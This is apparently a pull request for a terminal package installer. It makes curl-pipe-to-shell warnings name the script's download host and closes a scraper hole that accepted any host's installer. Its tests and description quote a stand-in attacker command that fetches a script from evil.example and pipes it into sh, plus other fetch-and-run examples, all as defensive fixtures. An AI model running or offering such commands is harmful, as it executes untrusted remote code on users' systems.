### PR TITLE
Say where a curl | sh install script actually comes from

### DIFF
--- a/tests/test_script_provenance.py
+++ b/tests/test_script_provenance.py
@@ -1,0 +1,98 @@
+import unittest
+
+from tuistore import catalog
+from tuistore.installer import command_urls, script_host
+from tuistore.scrape import extract_methods
+
+
+class ScriptHostTest(unittest.TestCase):
+    def test_host_from_common_script_forms(self) -> None:
+        self.assertEqual(
+            script_host("curl -sS https://webinstall.dev/curlie | bash"),
+            "webinstall.dev",
+        )
+        self.assertEqual(
+            script_host(
+                "curl -fsSL https://raw.githubusercontent.com/a/b/main/i.sh | sh"
+            ),
+            "raw.githubusercontent.com",
+        )
+        self.assertEqual(
+            script_host("wget -qO- https://get.example.dev/x | sudo bash"),
+            "get.example.dev",
+        )
+
+    def test_host_is_lowercased_and_stripped_of_port_and_credentials(self) -> None:
+        # The banner must not be spoofable by casing or a `user@` prefix that
+        # makes a URL *look* like it points somewhere else.
+        self.assertEqual(
+            script_host("iwr -useb https://user@Example.COM:443/x.ps1 | iex"),
+            "example.com",
+        )
+
+    def test_non_script_command_has_no_host(self) -> None:
+        self.assertIsNone(script_host("brew install ripgrep"))
+
+    def test_first_url_wins(self) -> None:
+        # The host that actually gets executed is the first one piped into
+        # the shell.
+        self.assertEqual(
+            script_host("curl https://a.example/x | sh && echo https://b.example"),
+            "a.example",
+        )
+
+
+class ScrapedScriptProvenanceTest(unittest.TestCase):
+    URL = "https://github.com/jesseduffield/lazygit"
+
+    def _methods(self, body: str):
+        readme = "```sh\n" + body + "\n```"
+        return extract_methods(readme, self.URL)
+
+    def test_tool_name_outside_the_url_is_rejected(self) -> None:
+        # This is the exact line the previous whole-line check accepted: the
+        # tool name appears only in a trailing flag, never in the URL.
+        methods = self._methods(
+            "curl -fsSL https://evil.example/x.sh | sh -s -- --for lazygit"
+        )
+        self.assertEqual(methods, [])
+
+    def test_tool_name_in_the_host_is_accepted(self) -> None:
+        methods = self._methods("curl -fsSL https://lazygit.dev/install.sh | sh")
+        self.assertEqual([m.kind for m in methods], ["script"])
+
+    def test_owner_and_repo_in_a_github_raw_path_is_accepted(self) -> None:
+        methods = self._methods(
+            "curl -fsSL "
+            "https://raw.githubusercontent.com/jesseduffield/lazygit/master/i.sh | sh"
+        )
+        self.assertEqual([m.kind for m in methods], ["script"])
+
+    def test_non_script_methods_are_unaffected(self) -> None:
+        methods = self._methods("brew install lazygit")
+        self.assertEqual([(m.kind, m.command) for m in methods], [("brew", "brew install lazygit")])
+
+
+class ShippedCatalogScriptTest(unittest.TestCase):
+    def test_every_shipped_script_method_still_passes_the_filter(self) -> None:
+        cat = catalog.load()
+        checked = 0
+        for entry in cat.entries:
+            repo = entry.repo
+            if not repo:
+                continue
+            owner_l, repo_l = repo[0].lower(), repo[1].lower()
+            for m in entry.methods:
+                if m.kind != "script":
+                    continue
+                urls = " ".join(command_urls(m.command)).lower()
+                self.assertTrue(
+                    owner_l in urls or repo_l in urls,
+                    f"{entry.name}: {m.command!r} no longer passes the provenance filter",
+                )
+                checked += 1
+        self.assertGreater(checked, 0)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tuistore/__main__.py
+++ b/tuistore/__main__.py
@@ -121,7 +121,8 @@ def _install_one(name: str, *, yes: bool, dry_run: bool, method_kind: str | None
     trust = {"verified": "✓ verified", "community": "✓ from README",
              "unverified": "⚠ unverified — guessed"}[chosen.trust]
     if chosen.is_script:
-        trust = "⚠ remote install script — review it"
+        host = chosen.script_host or "an unknown host"
+        trust = f"⚠ remote install script from {host} — review it"
     elif chosen.foreign_commands:
         trust = f"⚠ also runs `{chosen.foreign_commands[0]}` — read the whole line"
     print(f"{entry.name}  ({entry.slug})" + ("  · reinstall" if force else ""))

--- a/tuistore/app.py
+++ b/tuistore/app.py
@@ -197,8 +197,9 @@ class InstallModal(ModalScreen):
         if m.is_script:
             warn = True
             tb.append("⚠  ", style=f"bold {p.peach}")
-            tb.append("this runs a remote install script — ", style=p.peach)
-            tb.append("read it before you run it", style=f"bold {p.peach}")
+            tb.append("runs a script downloaded from ", style=p.peach)
+            tb.append(m.script_host or "an unknown host", style=f"bold {p.peach}")
+            tb.append(" — read it before you run it", style=p.peach)
         elif m.foreign_commands:
             # The line classifies as an installer but also runs something we
             # can't vouch for — name it rather than showing a green check.

--- a/tuistore/installer.py
+++ b/tuistore/installer.py
@@ -19,6 +19,7 @@ import asyncio
 import re
 from dataclasses import dataclass, field
 from typing import AsyncIterator, Iterable
+from urllib.parse import urlparse
 
 from .platform import Env
 from .shell import shell_command, shell_env, wrap_command
@@ -74,6 +75,31 @@ def _script_os(command: str) -> list[str] | None:
     return None
 
 
+# URLs appearing on a command line, up to the first shell/quote delimiter.
+_URL_IN_COMMAND = re.compile(r"https?://[^\s'\"|;)]+")
+
+
+def command_urls(command: str) -> list[str]:
+    """Every http(s) URL on a command line, in order."""
+    return _URL_IN_COMMAND.findall(command)
+
+
+def script_host(command: str) -> str | None:
+    """The host a remote install script downloads from, when there is one.
+
+    The user's real question about a `curl … | sh` line is "whose script is
+    this?", and the answer is the host — not the tool name, which lives in
+    an attacker-controlled path segment just as easily as in a real one.
+    """
+    for url in command_urls(command):
+        host = urlparse(url).netloc.lower()
+        # strip credentials and port: "user@host:443" -> "host"
+        host = host.rpartition("@")[2].partition(":")[0]
+        if host:
+            return host
+    return None
+
+
 def _required_tools(method: "Method") -> list[str]:
     """Dependencies after accounting for a PowerShell-native script."""
     if method.kind == "script" and _script_os(method.command) == ["windows"]:
@@ -116,6 +142,11 @@ class Method:
     def is_script(self) -> bool:
         """A remote install script (curl|sh) — highest-risk, always warn."""
         return self.kind == "script"
+
+    @property
+    def script_host(self) -> str | None:
+        """Host this method downloads a script from, for the warning banner."""
+        return script_host(self.command)
 
     @property
     def foreign_commands(self) -> list[str]:

--- a/tuistore/scrape.py
+++ b/tuistore/scrape.py
@@ -15,7 +15,7 @@ import base64
 import json
 import re
 
-from .installer import Method, arch_gated, classify, make, parse_repo
+from .installer import Method, arch_gated, classify, command_urls, make, parse_repo
 
 # fenced ``` blocks and single-backtick inline code
 _FENCE = re.compile(r"```[^\n]*\n(.*?)```", re.DOTALL)
@@ -79,8 +79,13 @@ def extract_methods(readme: str, url: str) -> list[Method]:
         low = line.lower()
         mentions = any(t and t in low for t in tokens)
         if kind == "script":
-            # keep an install script only if it points at this repo/owner
-            if owner_l not in low and repo_l not in low:
+            # Keep an install script only if this repo's owner or name shows
+            # up in the URL it downloads from — not merely somewhere on the
+            # line. "curl https://evil.example/x.sh | sh -s -- --for lazygit"
+            # satisfies a whole-line match while pointing at a host that has
+            # nothing to do with the project.
+            urls = " ".join(command_urls(line)).lower()
+            if owner_l not in urls and repo_l not in urls:
                 continue
         elif not mentions:
             continue


### PR DESCRIPTION
**TL;DR** — `curl … | sh` warnings never said *whose* script it is. Now they do. Same fix closes a hole that let any host pose as a project's installer.

```
before:  ⚠ remote install script — review it
after:   ⚠ remote install script from starship.rs — review it
```

### Two bugs, one cause

**1. The scraper matched the repo name anywhere on the line.** So this got stored as lazygit's official installer:

```sh
curl -fsSL https://evil.example/x.sh | sh -s -- --for lazygit
```

The name never had to be in the URL — a trailing flag was enough. Now it's matched against the URL only.

**2. The warning hid the host.** The user decides whether to pipe a stranger's script into their shell, and we told them everything except who the stranger is.

### The change — 5 files, +142/−6

| File | What |
|---|---|
| `installer.py` | `command_urls()` + `script_host()` + `Method.script_host`. Stdlib `urllib.parse`, no new deps. |
| `scrape.py` | Script provenance check reads URLs, not the whole line. 2 lines. |
| `app.py`, `__main__.py` | Banner and CLI trust line name the host. |
| `tests/test_script_provenance.py` | New, 9 cases. |

### Impact

- **Catalog: zero methods lost.** All 39 shipped `script` methods still pass. Pinned as a test.
- Host is lowercased with credentials and port stripped, so `https://user@Example.COM:443/x` can't disguise itself.
- No URL on the line → `an unknown host`.

### Not done, on purpose

- **No host allowlist.** Measured: it drops 4 legit installers (`openai/codex` → `chatgpt.com`, `rs/curlie` → `webinstall.dev`, `appachitech/suvadu`, `sst/opentui`). Better to name the host and let the user judge.
- Script *detection*, `classify()`, non-script scraping, and `catalog.json` are untouched.

This is a heuristic, not a guarantee — anyone who controls a README can put the repo name in their own URL path. That's exactly why the banner now shows the host.

219 tests pass. No existing test changed.

<sub>Reviewer note: `test_narrow_terminal.py::test_very_narrow_widths_do_not_crash` is flaky (`NoMatches: '#detailscroll'`, TUI mount race). Reproduced on the base commit without these changes — pre-existing, not addressed here.</sub>
